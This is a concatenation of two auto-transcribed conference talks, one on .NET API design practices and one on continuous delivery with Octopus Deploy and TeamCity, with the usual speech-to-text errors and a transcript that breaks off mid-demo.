struct. Because they behave subtly different to classes, and users generally expect something to work like a class, you want to use it only when performance is important. They represent, the struct will represent a single value. The struct is small. So the difference between a struct and a class reference when you're passing around is a class reference. So as reference to a class that's sitting on the heap is the reference will always be the exact same size no matter how big the class is. The difference with a struct is because when you're passing around and assigning it to variables, you're passing around the entire struct. If your struct has hundreds and hundreds of fields on it, and it's potentially quite large, you're going to use up a lot of memory each time you create a new one, or you pass it to a method. So for those reasons, you want to only use a struct when you have a small number of fields. So the rule of thumb that the Microsoft guidelines recommend is under 16 bytes. So if the number of bytes of your field, so if you've got ints and floats on there, if they are greater than 16 bytes and you probably want to stick with the class, you also always want your structs to be immutable. You can get some really odd behavior because they're stack allocated when they get boxed. So if you assign it to an object reference, that.NET framework will box it. And if you then make modifications to that box struct, it won't flow through to other places. It's as complex the situations where it can happen. And for that reason, you should really only use structs which are immutable. Struct should also only have a valid empty state. So because they're stack allocated, the default value isn't null. The default value of a struct is a struct with all its fields with a default value. So if you, for example, create an array of structs, each of the elements in that array won't be a null value. It will be an empty struct. So it'll be a struct with its default value. So for example, the datetime in.NET, its default state is 0, 0, 0, 0, 0, 0. And decimal, which is another example of a struct within.NET, its default value is 0. So you need to think about having a valid empty state. And finally, a struct should implement iequitable. Because structs aren't reference objects, when.NET compares the two of them, it isn't as simple as comparing two references and seeing whether they point towards the same object. What.NET does is it will use reflection to reflect over all the structs' fields and compare them one by one, which is quite slow. So you want to manually implement iequitable yourself. So this is just a quick example of a struct done well. So thanks for notice. The fields are immutable. So we've got a constructor, which is assigning those fields. And also down there, we've implemented our own equitable. So equitable is quite simple. It's just an equals method, which takes the same type as itself. And then within there, you can manually do your comparisons. So structs are great for performance, but you just want to be careful about how you use them. So designing enums. Enums are great for closed sets of choices. It allows you to strongly type a choice. And by strongly typing it, you're giving users IntelliSense, you're giving them documentation. So a great example of a struct, I mean a struct, an enum, is Day of Week. It's small, it's constrained, it's not going to grow. A bad example might be Windows version. Microsoft's constantly releasing new versions of Windows, it's constantly releasing new service packs. Every time you release a new version of your framework, you just going to have to add more and more Windows versions. This might be a case where a better choice might be using integers represent a version. With enums, you want to provide a value for zero. Again, they're value types. The default value of enum is zero. And you just want to provide a named value for that. So in the case of string split options, this is an enum with a.NET framework. Its default value is none. The first enum value in this case is always zero. Then the next one will be one. Unless you provide numbers yourself, it will always start at zero. So an enum can support having multiple values at once. And the way you do this is by specifying the flags attribute on that enum. So this is an example from JSON.NET of a flags enum. It's got the flags attribute on it. And then what you need to do for each value within the enum, and unfortunately there aren't more of them on this. And otherwise you'd see a cleaner is you should always go by powers of two. So you should always start with zero, then one, then two, then four, then eight, then 16, and 32. By doing that, you are able to then give users the option to and those options together. So that way a user can say a value should enable reserve reference handling both for objects and arrays by anding those two enums together. And in this example, within a flags enum, you can do that yourself. So all, for example, is an example of objects and arrays being added together. Well, in this case, odd. So with methods, you want to provide descriptive parameter names. Not only do they appear in an IntelliSense, in the latest version of C-Sharp, you can also have named them as named arguments. So by giving descriptive parameter names, it can be the difference between a user quickly and easily using a method and succeeding or having to ask for help, because they don't understand how it should be used. So this is an example of just helping them fall into a pit of success. With methods, you want to have a consistent parameter overload order. So you don't want to confuse developers by mixing around the orders, the order of arguments, the parameters that the method overloads takes of arguments. So an example, this isn't a terribly good example, because this is actually constructors. But this is from within the Donet framework. It's an example of mixing up the order of the same parameters, but just in different orders. So the one down the bottom, pretty much every other exception in.NET will always take message as the first argument. But argument null exception is the one exception in the entire.NET framework. It takes a pram name first. And quite often, you see developers getting them wrong order. And then the description when argument null exception is thrown is a little weird, because it gives the message as the parameter that's null and then the parameter name as the message. When you're designing methods, you want to prefer enum over boolean parameters. So an enum parameter with a descriptive name is much more obvious in what it does than a boolean parameter. So an example, we've got two overloads here. We've got an equals, which takes two strings and a boolean and equals, which takes two strings and an enum. So in that first overload, it isn't immediately obvious what that true is doing. Is that true to ignore case? Is that true to ignore culture? Is that true to trim whitespace from the beginning and the end of the string that we're passing in? It's not immediately obvious. Well, with the second overload, the one which takes the enum, straight away a user can immediately understand what exactly that's doing. So that's why you want to just prefer enums over booleans for parameters when you can. And even if you just have two. So even if you could use true false, it's a lot easier if you just define an enum. You want to avoid out and ref parameters. So this example, when someone wants to call this method, so they're passing in an assembly path and they're getting out a title, they're getting out a description, and they're getting out a company for that assembly. They need to define all these arguments before they can call your method, and then they pass them in. Much easier for a user to just use a method which returns one type. So just create your own object, assign the values to it, and return that. And it's much easier for users to use. Don't be afraid to create helper methods. So a goal of the pit of success is to prevent users from making mistakes. So anytime you have boilerplate code that's repeated over and over within your application, whenever someone potentially needs to use an API, think about wrapping that up in a helper method. So by wrapping, having to create a string reader and then creating a JSON text reader which uses a string reader, then having a schema resolver and a schema builder, it's much easier. Really, all the user is passing in as a string, and they're expecting to get back this JSON schema object. So by creating a helper method, we've eliminated the need for a user to firstly know to create this boilerplate code to potentially make mistakes in it. And we're helping them fall into that pit of success. So properties are quite interesting. So although internally, properties are really just methods, users expect properties to act like fields. And you should strive when possible to meet what users expectations. So the first thing users expect about properties is they should be fast. So imagine we've got this DB context object, and we've got a products property on it. And each time you call dot products, it's going off to the database and loading all the products out of the database. And then imagine the users put it in a loop, and there's 100 products. They're going to load every single product from a database 100 times. Now a user probably wouldn't expect that from a property. They'd expect it to be fast and instant and have very little or no time or overhead. They'd probably certainly wouldn't expect it to call off to a database. So imagine you changed that to a method. So immediately, this looks a bit more suspect. If you saw code which was doing this, you would think about, am I doing that the right way? And methods convey the expectation that there's potentially work is going to go on inside this method. The method might be slow. So you probably want to case your result once and then use that. So by not using a property in that case, by using a method instead, you're encouraging users to use the code more correctly. Also with properties, the result should be consistent. So you don't expect fields to suddenly change. Properties probably shouldn't change either. So imagine we had this a Goode object and on it we had new Goode. So new Goode generated a new Goode. That's probably not quite correct. What's probably a better way to do it is have it as a method. Just like you can't have set only fields, you probably shouldn't have set only properties, even though Donet allows you to do it. So imagine we had a user class and we had a password property on it, but it was set only. And when we set that password property internally, we would hash it and we'd assign that to a field. That's a little weird to use. When they see that there's a password property on a user, they'll probably expect they both be able to assign to it and get a value from it. So in this case, if you don't want to use it to be able to access the result, just change it to a set only property. And users would be much less confused. So for constructor design, constructors should be lazy. Where possible, you want to defer work until it is needed. So imagine in this case, we've got an XML file object. And it's got a constructor on it, which takes a path. And then within the constructor, we're going off to the file system, we're loading that file into an X document, and we're assigning it. And then when someone calls getXML, then we actually return that X document. Imagine then that someone had this little link statement. So they were getting all the XML files on the C drive that ended with XML. They loaded them in. They instantiated these XML files. And then they signed that to a list. Imagine further that a user then only uses maybe one or two of those XML file objects. Even though they've only used one or two, you've still gone off to the disk and loaded hundreds of files potentially. So what you want to do instead is make it lazy. So you want to defer the work only until it's needed. And constructors should really just be about initializing private fields from parameters. So in this case, we're now just assigning path to its own string. And then within getXML, at that point we do the work. And because we probably still want getXML to be fast, we cache the XML document. So we now get the best of both worlds. We still get our own custom XML file class, which has got our business logic. But we're deferring the work until it's needed. With Constructor Design, this one isn't terribly important. But all you're doing is you're setting a field from a parameter. Just make the property name match the same name as the parameter. It just helps users understand what's going on more readily. So one interesting thing about Constructors, and this is something a lot of people don't know, is you want to avoid calling virtual members within a Constructor. So imagine we have this parent class. And it's got a Constructor, which calls doSomething. DoSomething is virtual. We then create a child class that inherits from parent. Within its Constructor, we assign a message. And then in doSomething, we use that message field. Now there's a problem here. The problem is the order of which Constructors are called. The parent constructor is called before the child constructor. But when doSomething is called, it will always call the most derived override. So when we create an instance of our child, we'll call the parent constructor first. It will call doSomething. DoSomething will expect message to be assigned, but it hasn't been. So for that reason, you want to avoid calling virtual methods within a Constructor. Even if you do it correctly, if someone then inherits from your own class, and then they override a virtual method to expect values from the Constructor, you're potentially going to confuse the heck out of them, because it's all going to break. So throwing exceptions. I'm of the opinion that how you fail is almost as important as how you succeed with an API. Users tend to learn not by reading documentation. They tend to learn just by grabbing some code and start exploring classes and instantiating them and calling methods until stuff works. And giving them helpful exceptions helps them learn by failing. So in my JSON.NET library, probably the most common error that people encounter is deserializing incorrect JSON onto types. So in this case, we've got a person class that has a string name and hobbies, which is a list of strings. But in our JSON, hobbies is just a string. It's common delimited, but if you try and deserialize a string into a list collection, it's going to fail. And the error that people got. So this was back in JSON.NET 1.0 many years ago. This is the error that people would get if they tried to do that. So expected JSON array contract got JSON string contract. So internally within JSON.NET, I was expecting a string, but I was getting an array. But I was giving the users a very bad message. And even though I was throwing an error, which is great, the worst thing you can do is just silently fail, it wasn't helping a user. A user would see this, so it would get confused. They would ask for help. They would have to read documentation. They would potentially just throw JSON.NET away and they'd use something else. So this is an example of a good error message. Later I improved the error message to be something more like this. So error converting value, I just got the string value. To type, and I'd list the type, and then I'd throw that as an error. It's immediately much more obvious what's going wrong. They would look at that hobby's value. They would potentially see, hey, that's a string. They would look at the type that they'd be deserializing to. Hey, that's a list, it's not a string. That's why I'm failing. And the user's able to quickly fix the mistake themselves without having to go looking for help. To go even further, in later versions of JSON.NET, I included information like the position of the JSON and the path to it. So now it's immediately obvious, even if it was a huge JSON file, exactly which JSON was causing the error. And a user would be quickly able to fix this issue. And if we compare it to what they were originally getting, it's much easier for a user to understand what's going on and what went wrong and fix it themselves. So with errors, it's very important to fail fast. So imagine we had this report service, and it took some credentials. In this case, we're passing it null. But because we're not validating it, down here, if we then try and call generate report, and we do give it a valid argument, we're getting a null reference error. But we're getting a null reference error from code earlier than where we got the error. So the developer is really confused. What you want to do is you want to fail as soon as the user does something wrong with your code. That makes it immediately obvious to them what's wrong, where it went wrong, and how they can fix it. So with exceptions, you want a subclass exception to provide your own custom exceptions. This allows users to catch exceptions that are specific to your library and ignore exceptions from potentially their own code. So in this case, I've created my own JSON serialization exception. I inherit from exception. I've got a constructor call, which then passes value to the basic exception. This will then allow users to do try catch, and they only catch a JSON exception. Then when you're performing operations, quite often it's useful to catch exceptions from the underlying.NET framework and wrap it in your own exception and then re-throw that to the user. So in this case, I've got a property info, which is used in reflection, then got a value, which has been set on a target. If there's an error inside that, perhaps the value doesn't match the property type. When an error happens, I'm catching that exception. I'm adding some additional information to it. So in this case, I'm giving the name of the property, which calls the error. And then I'm re-throwing that. It's very important when you do this, when you re-throw an exception, that you wrap it. So in this case, I'm passing it to the constructor of my own exception. This preserves the stack trace. Otherwise, whenever you throw a new exception, you throw away the stack trace. So in this case, the original exception will become an error exception. So when designing for extensibility, you want to use virtual methods with care. So there's two schools of thought with virtual exceptions. There's one, which is make everything public, make everything protected, nothing's private, everything's virtual. As a user can do exactly what they want, they can override all the things. And that way, your library is infinitely powerful. The problem with that is it's quite easy to break existing code with virtual methods. You already saw in that previous case with the constructor of virtual method in there, can cause issues. So I'm of the opinion you want to use virtual methods with care. They're powerful, but they're dangerous. And you need to put thought into how they're used. So the other thing you want to think about when designing for extensibility is prefer composition over inheritance. So inheritance is very useful. But composition is potentially much more powerful and provides much more ability for users to customize how something works. So the case of JSON.net, the JSON sterilizer, there are zero virtual methods on it. All the extensibility to it is provided through other objects that you can plug into it. So you can plug in a reference resolver. You can plug in a contract resolver. You can plug in a trace write. You can plug in your own custom JSON converters. By doing that, you're also encouraging reusability. People can implement their own reference resolvers, contract resolvers, JSON converters. And then they can publish those to the web. And then other people can use those and plug those in within their own applications. So the final thing we'll look at is designing for performance. So a lot of the key things for designing performance have actually already covered. So lazy constructors. So you want to have your constructors just to initialization. You want to lazily defer work until it's needed. Cheap properties. So property should be fast. You don't want to use exceptions for flow control. Throwing exceptions is very slow if you're doing a lot of them. So perhaps if you've got a web request and you only throw one exception, that's fine. If you're doing a web request and you've got a for each loop and within each iteration you're throwing an exception and that loop runs a thousand times. Those a thousand of exceptions can certainly add up. So avoid using exceptions for flow control. Use exceptions just for when something actually does go wrong. Use structs when appropriate. If you're allocating tens of thousands of objects, that can be fine. But doing it within a high throughput web application, you can create a lot of garbage collection which can potentially slow your website right down when garbage collection does happen. You want to use async properly. I'm not going to cover how to use it properly because that's literally an hour in itself. So that's the whole async await that's been introduced from a newest version of.NET. Doing it properly is very hard. I recommend if you do have an API that does have long running operations, look into how to use it properly. And I think it's very important when designing for performance to avoid harming API usability for internal performance gains. So computers tend to get faster but your API is not going to get more usable over time. So even if it's slow today you might figure out a way to make it faster and future internally. But once you've published an API and people are using that API, you've got no way to really take it back. So some more information. If you're curious about API design and you want to know more, I really recommend this book. It was written by Brad Abrams. He turned that phrase the power of sameness and some other people at Microsoft. The most recent version of this, the framework design guidelines, is a second edition. It came out in 2008. So although that was a little while ago, the vast majority of it is still applicable today. And I really recommend it. And another great resource is this YouTube video. It was put up by a guy at Google. How to design a good API and why it matters. And although Google, they're more C++ and Java and Python, none of it is.NET specific. A lot of the high level concepts are still applicable and it's quite a good watch. So that's everything I have for you today. It looks like we're bang out of time. I'm going to hang around to answer questions. But other than that, you've been a great audience. And I hope everyone has learned something. And thank you very much. Thank you.....
|
There are .NET libraries that are complex to setup, hard to understand, difficult to debug, and impossible to extend. And then there are .NET libraries for the same task that wonderfully just work. Why do some libraries succeed where others fail? In this session James will discuss what makes a well designed API, from high level design principles like The Pit of Success, The Wall of Complexity, and The Power of Sameness, to applying those concepts in low level .NET class design, with the goal of creating .NET libraries that developers love to use.
|
10.5446/50809 (DOI)
|
All right, good morning. How's everybody doing after the attendee party last night? Well, some of you made it here and that's good. So my name is Jeff French and I've been delivering software for, I don't know, about five to eight years to production systems. I've been delivering it well for about two years. And a lot of that was, you know, a learning experience. And that's what I want to kind of share with you today about my search for what the right delivery process looks like and how I found it in a couple of tools called Octopus Deploy and TeamCity. So first, a quick show of hands. How many people are practicing agile at your shop? Yeah? It's kind of bright up here. I'm not sure how many people, okay. And how many of you are practicing continuous delivery currently? Okay. About half? Good, good. Oops. Okay, next slide. Oh, okay. Here's my vanity plate, my shameless self-promotion. If you want to follow me on Twitter, check out my blog. I'll have this information at the end too. So today, here's kind of what we're going to go through. We're going to start by talking about what continuous delivery is and, you know, why it's important, some of the wrong ways that I have tried to do it over the years and how I kind of landed on the right way to do it. So this is my definition of continuous delivery, okay. Working tested software to your customers as frequently as is practical. Now I say practical rather than possible because it may be possible for you to deliver working tested software every 10 minutes if you work someplace like GitHub and they do that. It may not be practical because your end users may not actually tolerate that pace. This was something that I found in my own experience. Now here's a couple of quotes from the principles behind the agile manifesto. All you people who are practicing agile, have you read the agile manifesto? No? It was written back in 2001 when the kind of concepts of agile were first being discussed. And some of the principles they had there were, as you see on the screen, satisfy the customer through early and continuous delivery of valuable software. Deliver working software frequently from a couple of weeks to a couple of months, all right. When the kind of founding fathers, if you will, of agile were kind of coming up with these concepts that we are all practicing today, they understood inherently that continuous delivery was going to be an integral part of practicing a good agile system because it doesn't do you any good to develop in quick short iterations if you're not actually taking that business value you've created and delivering it to your users. It's not business value until you deliver it, right? So I told you before that you need to deliver software as frequently as is practical, all right, because you don't want to be this guy. This was me. I had a nice agile system set up at one of my companies and we were getting two weeks prints going and we were starting to really kind of get a nice pace and building a good velocity and all that. We set up a nice little continuous delivery system. It was a decent one anyway and started delivering to production every two weeks on the nose every Wednesday night or every other Wednesday night. I was pushing out that sprints deliverables and feeling pretty good about myself. You're like, all right, look at me go. Good job, Jeff. You went ahead and started doing agile and you're delivering business value to your customers early and often. This is great and I bet my customers are super happy with it. After about three months I got called into a meeting with the rest of the business stakeholders that I was delivering these applications to and they said, hey, why don't you slow down a little bit? I was like, what? Just blew my mind. I'm delivering new features too often. I've never heard this complaint before. I thought that was the whole reason we're doing agile. It turns out that the folks who were using this had a jam-packed busy day and they knew our system very, very well, even its limitations or things that they had to use workarounds for. They were so busy on a day-to-day basis that they didn't have time in their schedule every two weeks to stop and learn new features or find where things have been reorganized as we optimize our user experience. Even though it was things that were ultimately going to save them time and make them more productive, they didn't have time to learn it that frequently. They said, we'd rather go quarterly. That way, once a quarter, we know when the release is coming and we can go ahead and train on it in advance and set aside time that one time once a quarter and then have all those new features. I cried a little bit and I was sad and I moped around the office a little bit. Then it hit me. I was like, well, you know, we started practicing it that way. We spent about a quarter doing that. What we found was that all of a sudden, we were doing this. Our business users would report a bug that's causing them a problem. We would pick that up and we'd put it in the sprint and we'd fix that bug and we'd mark it as resolved in our tracking system. The user who reported it would get a notification that said, great, your bug has been fixed. Now your life is going to be awesome. They'd say, that's great. Then is that coming out? They'd say, oh, it's coming out in three months. You already fixed it, though. How come I still have to put up with this? That's when I figured out that what worked best for my company at the time, and this has been something that other companies have really adopted too, is pushing out bug fixes at the end of every sprint, but saving the features for a quarterly release or whenever your business users or end users will tolerate those new features coming out. We just developed a bit of a branching strategy where we're like, okay, this branch represents what's in production right now. Here's our development branch. If you build a feature, leave it on the development branch until the end of the quarter. If you fix a bug and you're signing the bug off, then just cherry pick that change set down here to our release branch and we'll push it out at the end of the sprint. That established a really nice cadence that worked well for both our development team and the end users that we were delivering software for, and it worked out really, really well. If you are at a company that, like mine was before we got a good continuous delivery system going, practicing what I like to call a scrumber fall, where you have a scrum system on your development team that's jammed in the middle of a waterfall delivery cycle. If you're doing that, you're kind of trolling your users and you need to find a way to deliver that valuable software to them more frequently. Today, as we talk about continuous delivery, we're going to look at a system that is described on this slide. The reason that it has complexity is because as I was looking for a good way to deliver software, I would go to conferences or watch talks online and they would show me cool stuff like, hey, here you go, check this out. Here's how you can right click and deploy from Visual Studio and it's going to automatically deploy your stuff and it's great. I'd say, yeah, that is awesome. I love it. That's great. I'd come back from the conference or from watching a talk and I'd tell the rest of the dev team, I learned the coolest thing. It's going to be awesome. We're going to be able to just right click in Visual Studio and deploy a website. It's going to be cool. Then I would go, because these guys stood on stage and they went file new, Hello World, MBC app and shipped it right out the door and it was fine. Then I went back and I opened up my copy of Visual Studio with our solution that had 69 projects in it comprised of about eight or nine deployable web apps, three or four Windows services. We had four or five console apps that had to be run as scheduled tasks. We had services that used MSM queue for message queuing and we had to create message queues when we deployed and everything. I would go, oh, the guy on stage didn't show me how to do this with an actual complex application that has a lot of parts to it. They just showed me the new hotness of MBC and how I could right click and deploy. I found out that doing deployments of a real application is hard. You need a good set of tooling around that. So I started building it and I tried this. We would go ahead and just right click and deploy and try to build up zip files and X copy them out to production shares and unzip them and make sure it was on all the web servers. Wow. That did not work very well at all. There was a lot of, we had to do releases at 11 p.m. on Wednesday nights and there was many a time that at 4 a.m. on Thursday in a very, very exhausted state where I couldn't even think straight, I was trying to roll back a failed deployment so that whenever all my users got ready to come to work in the morning, they actually had a system to use. It was not good. The reasons being, it wasn't consistent. There was no consistency in how things got deployed. It was definitely not repeatable so if I had to redeploy the same version, there was no way I could actually guarantee I was going to get it right. And there was no traceability. So even trying to roll back my own stuff, I had to try to remember what all I had done so I could go on and do it. And that left a really bad taste in my mouth with deployments. So I did what any smart developer would do. I said, if I got to do something more than once, I'm going to automate it, right? So I wrote some batch scripts. They're all batch files, right? That's the first line of defense in deployment. And it got better. Suddenly our deployments were a little bit more consistent. They were a little bit closer to repeatable. They were a little bit traceable. I had to occasionally write something out to a log file somewhere. And it got a little bit better. But these batch scripts got really, really unwieldy over time. There was a lot of just really stupid complex logic in it, hard-coded passwords for production accounts. It was not pretty. But it worked for a while, and we were doing it. And we were using this method when we first started delivering to production every two weeks and my users got mad at me. But I had it working. But it left me kind of wanting more and trying to figure out there's got to be a better way to deploy software. And it made me start thinking about what things really need to be in a good deployment system. And that's where these bullet points kind of come from, is that I said, hey, it's got to be consistent. It's got to do it the same way every single time. It's got to be repeatable so that if I have a production server crash and I need to redeploy my application to it, it's got to be the same as it was before. And most of all, I needed some traceability, especially as there was more people than just me doing deployments. We needed to know who had been doing what so we could make sure that we went and shook our finger at the right person if everything was broken. And it was usually me. So maybe the traceability kind of bit me in the ass. Then I stumbled across a product that at the time was in beta called Octopus Deploy. And it kind of opened my eyes to a new way of building things. It's got the concept of build once and deploy everywhere. Build your executables, your binaries, your DLLs, whatever your deliverable package is for your website, your service, your EXE, build it once. And then deploy that same exact built thing everywhere that you needed to go. And that means to all your multiple environments. This is big, especially if you have to be like SOX compliant at your company. You need to be able to prove that the very binary that you tested and signed off as good is the exact same thing that you sent to production. Octopus Deploy supports that. And I was like, oh, that's brilliant because I was running a new build every time because I wanted all my web config transforms to work for each one of my environments. So I was having to run that. It's repeatable. It's automated, which is the biggest thing. I don't know if you guys know this about yourselves, but you're human, I'm pretty sure. And like me, you probably make mistakes from time to time. And so do the other end. Well, I'm sorry, you guys, I'm sure don't make mistakes, but the other engineers on your team, am I right? Like those guys make mistakes. And that's why you want to automate your stuff. So you can say, hey, look, I wrote the automation script, so I know it's good. Therefore you don't have to go do this process and screw it up, which is one of those things that really saved my own butt a lot of times because I only had to get it right once. Octopus deploy introduces the concept of like an approval process for your deployments. So you can go ahead and get an authoritative approval by the right person in the company that says, yes, these things can go to production. They've been signed off. And it also created a whole lot of logging and traceability. So I had good insight into what was going on. So let's take a look at it. So over here, I've got a nice little Windows Server 2012 machine. And this beautiful little thing you see here is octopus deploy. Coming off the bat, you're going to see one of my favorite features of octopus deploy, which is this dashboard. This dashboard becomes an information radiator that you can use and you can put this up on a screen somewhere in your ops area or your dev area or both. And all of a sudden, everybody, your dev team, your ops team, your dev ops team, if you're cool enough to have that title, can all see what version you've got deployed in what environment. Was it a successful deployment or is there a big red failure? So let's take a look at this. As you can see here, I've got version 2.0.7.25 in development, but I'm only on.24 in staging and production. And so I'm pretty sure that.25 is ready to go, it's ready to go out to staging and be tested. So let's go push it to staging. I'm going to click in here and I'm going to say promote to staging. Okay, here's the steps it's going to run. Great. Do it. And here it goes. It's deploying. It's all I had to do. Click, click, done. It's acquired. It's packages that it's going to deploy. It's going through and deploying my service bus is deploying my website. It's going to deploy the mailer scheduled task. And there you go. Now, I just pushed the exact same bits that I said were in development that I was like, hey, I went out and I tested it in development right over here. 2.0.7.25 in our development environment at development.complexcommerce.com and I pushed it out to staging. Here's our staging area. As you can see, we're in staging.complexcommerce.com. So let's go ahead and refresh and take a look at, ah, look at that. 2.0.7.25, push to staging. That was pretty simple. I didn't even open up a command shell or Visual Studio to do that. That's good stuff. So let's take a look at what this did for us. All right. Obviously it deployed our website. Let's go have a look in here. Everybody see that okay? Oops. That's not what we want. So as you can see here, I've got this complex commerce website. Obviously I, you know, like a real production system, I'm running dev staging and production all on one machine. It's a demo. I've got complexcommerce.development, complexcommerce.production, complexcommerce.staging. Octopus deploy came in here and created those sites for me. They didn't exist before I did the first deployment. All right. It came in and set up my site in IAS. It created application pools that you can see here. Set them to the right version of.NET framework of 4.0 and integrated. Set them to have application pool identity or I could tell Octopus, hey, go ahead and use this dedicated user I've set up for each environment. It did all that for me. Great. That means that now I know my websites are created in a repeatable manner. If I have to deploy this onto six or eight or 10 web servers, it's going to set those sites up for me the right way. It's going to set the right application pool identity so that if I've configured my production domain so that this particular app pool identity has access to a database or a particular file share, Octopus deploy is going to make sure I've got all that set up and ready to go. Now until we were deploying something complex, we also had some Windows services in there, right? We had one anyway. It's a service bus that handles communication between whatever, full disclosure, this website doesn't work. But it does have these Windows services and as you can see here, it created the complex commerce service bus for development, production and staging. Again, those didn't exist before I did the first deployment. It came in here and every time I do a new deployment, it updates those. We pointed at the right version of the EXE running under the right service account. What all kind of stuff can you deploy with Octopus deploy? Anything you can think of just about that gets deployed on Windows, you can do it with Octopus deploy. It's got really great, rich support for deploying websites to IIS, deploying Windows services. It's got integrated support for deploying to Windows Azure, Windows Azure websites, Windows Azure cloud services. You can deploy over FTP or SFTP. Basically you can deploy just about anything. You can deploy a command line file. All you've got to do is package up your application in a certain format that we'll talk about in a minute and feed it to Octopus deploy and say, I want you to go put it on these machines. The reason I say you can deploy anything is because Octopus deploy is based on PowerShell. Basically anything you can do with PowerShell, you can do with Octopus deploy. You're going to go ahead and put in some of these scripts that it's going to run by convention. If it finds one of these scripts in your package, it will run it at the appropriate time. You can tell by the name is pretty much what they do. We've got a pre-deploy that it's going to run before it actually starts the deployment after it's unzipped your package. It's got the deploy.ps1 that's going to represent the actual deployment that needs to happen. A post deploy if you need to do any cleanup or run any integration tests or warm up your site. Deploy failed in case something goes wrong during the deployment. You can have a hook in there to actually go and log it somewhere, gather some debug info, roll something back. There's a lot of good options there. Let's have another demo. I told you that Octopus deploy supports the concept of build once and run everywhere. Let's look at what we're doing for our builds. In this system, I'm using TeamCity. I used to use Team Foundation Server, but I'm recovering. I'm using TeamCity now. To be fair, I haven't used Team Foundation Server since about TFS 2010. I hope it's gotten better, maybe, but I abandoned it for TeamCity and I haven't looked back since. TeamCity is super easy to configure and it has a ton of features. It's also good for running. It can run on multiple platforms and it can build for multiple platforms as well, which is a lot harder to do with TeamCity from what I recall. As you can see, I've got myself this build project here. Every time that I check in some code, it runs this build. It's looking at my Git repository and every time it sees a commit, it says, all right, cool. I'm going to build that for you and run all your build steps. Let's go look at what the build steps look like. We've got some general metadata about the build here, a build version here. I'm having it create a nice semantic versioning thing for me. Obviously, I've done a really nice thing of locking this into 2.0.7 and then just using TeamCity's build counter. You can really customize this based on a lot of things. You can even share build counters and build numbers between multiple build configurations. There's a lot of powerful stuff here. Using our build steps, you can see TeamCity's got nice support for doing NuGet package restore, right, because you don't want to check all those things into your Git repository. Just check in your package file, sorry, not NPM, and have your package.config and then have this guy go ahead and run your NuGet install. Put all your NuGet packages back in for you. Keep your repository size nice and down. It's got a built-in solution runner that says, okay, cool, I'm going to just run this build for Visual Studio solution. You point it at the solution file, tell it what targets that you want it to build, and it goes off and builds it for you. Yay. It just shells out to MSBuild for that. Right here, I've got a NuGet publish step. I told you before that you needed to package your application a certain way for Octopus to deploy to use it. Well, that certain way is a NuGet package, which sounds a little weird. You're like, wait a second, that's for packaging up libraries and tools, not my application. To be honest, it uses the NuGet package as a glorified zip file. Essentially it's a zip file that contains metadata, most important of which being a version number. That's what Octopus deploy is really after out of the thing. Because that provides a nice way that.NET developers are already accustomed to working with stuff, it makes a great packaging format that can also support versioning. Let's take a look at my solution over here. We're going to see that up here at the top of my complex commerce solution, I've got this little thing called.Octopack that looks a lot like the way.NuGet embeds itself in your solution to support package restore. It even has its own copy of NuGet.exe. It's got a.targets file here that essentially provides a set of MSBuild targets that allows it to hook in to your native build solution and create this NuGet package for you. You don't have to worry about how to do it. It has automatic support for both websites and then binary type things such as executables or Windows services. It will detect your project type and handle it accordingly. All you really have to do is set a MSBuild variable that says, as you can see here, it injects itself in the build depends on Octopack target and it's got this run Octopack condition. You probably don't want to build the NuGet package on your local machine every time you run your app from Visual Studio. This is going to go ahead and allow you to not have to worry about that. You can just set this on your continuous integration server and have them built out there. This is what we have done with our team city solution. Let me switch back over to team city. Octopus deploy provides a team city plugin that makes working with or integrating team city with Octopus deploy much, much simpler. After installing the Octopus deploy plugin for team city, if I come down here and look at my Visual Studio build step, there is some Octopus packaging down here. I just check a box that says run Octopack. I say, okay, just use the build number for this build that we're already generating in order to create the package versions that we want to look at. Now whenever my builds run, it automatically creates those packages, which I can then publish using this NuGet publish step. It's interesting here. You'll notice that the target is localhost. That's actually pointing at my Octopus deploy server. Octopus deploy has a built-in NuGet package feed that works pretty well and is very fast. You don't have to use it. You can use an external feed if you already have your own MyGet setup maybe or you're running a local one. Be wary of using a file system-based NuGet feed for whatever reason. They're insanely slow. Hopefully, improvement has been made on that, but I don't think so. Octopus deploy's internal implementation is really, really fast. It's got some optimizations to handle it a little bit better. I tell it, cool, go pick up the.NewPackage file out of these directories that I built and publish it out to my Octopus deploy server so that Octopus deploy has packages to send out. Now, we're going to go ahead and take this one step further because right now I'm running a build on every single check-in, but then I have to come over here to Octopus deploy and say, okay, yeah, that's great. I've got my build going here, but now I've got to go create a new release and select the package versions that I want to deploy. Well, I probably want to deploy the latest version that I just built, and I can add some release notes and say, okay, cool, let's create this version. Well, I don't want to have to do that every time. I want to continuously deliver. I want this to happen automatically, especially to my dev environment where we're trying to dog food this thing and make sure that it's working well. Let's go add a step to our build process here. I'm going to say, let's add a new build step. This is going to be based on the Octopus deploy plug-in, a create release step. You can see I've already got my URL there, my API keys are already in. Thanks for remembering that for me, Chrome. By the way, Chrome knows way too much about me. It's a little bit scary. I'm going to tell it the project that I wanted to create. I'm going to say, for the release number, let's go ahead and use this built-in team city variable for the build number. I want you to deploy it to my development environment. I want you to wait for the deployment to complete because if the deployment fails, I want my build to fail. I want everything to go red across the board on my build server, on my deployment server. I want to know that something's wrong. I can pass in additional command line parameters. Safe. Excellent. Let's go make a change. The notice up here in our title bar, you can see that I've got the environment that these things are deployed to in the title of the site. It would be a lot easier to read that if those two things were switched around. Let's take a look at how that environment is getting put in there and make that change. You'll see here, if I come open up this complex commerce.web in my home view. This is a Nancy app. I am simply saying, great, I'm sorry, it's in the actual shared template. I am saying, great, on our title, set it to complex commerce, view bag dot environment. Awesome. As you can imagine, we are pulling that from our system.configuration.configurationmanager.app settings environment. Great. It's in our web config. Cool. In the web config, I've got this thing set to local. How is it getting set to the rest of those things? Octopus deploy has the concept of variables and it will go through and perform these transforms for you. Rather than having, you'll notice, I only have a web dot debug and a web dot release. I don't have a web dot staging, a web dot production. I don't have any of that in there to actually transform this thing for those environments. I'm letting octopus deploy handle that for me. If I come in here and look at the setup of my octopus deploy project in our build process, here's all the steps that I've told it how to deploy my stuff. I've also got a set of variables. You'll see right here, I created a variable called environment. It's not a very creative name, but it works. I've told octopus to plug in a special value that octopus deploy creates. It has all these built-in variables like the environment name, the machine name it's deploying to, the step that it's currently deploying, the version that it's deploying, what was the last version that was deployed, all these variables that it makes available to you. You can scope those variables to different settings such as, oh, I want this variable to only apply to this particular environment or on these machines or in these roles. Well, I've told it to put the environment name that it's deploying into my environment variable so that gets surfaced in my application. We see that in what is made right up here in our, where did our little shared config go? Layout.cshtml. Great. Let's go ahead and make this change to say, let's put the environment name first. And let's save it. And let's jump down here to our, okay, great. We've got a changed file. We'll say git add 